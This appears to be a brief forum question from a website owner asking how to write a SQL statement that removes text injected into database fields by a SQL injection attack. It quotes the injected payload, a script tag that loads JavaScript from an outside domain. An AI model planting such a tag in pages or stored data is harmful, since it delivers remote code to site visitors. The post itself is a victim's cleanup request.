Wondering if anyone can help me with removing some junk inserted into my tables by a SQL injection hack. They somehow managed to append the text '<script src=http://www.banner82.com/b.js></script>' to several of my text fields. Where the fields were previously empty it's easy to remove, but what SQL command can I use to remove it from the end of fields without losing the rest of the field contents?
Thanks
Thanks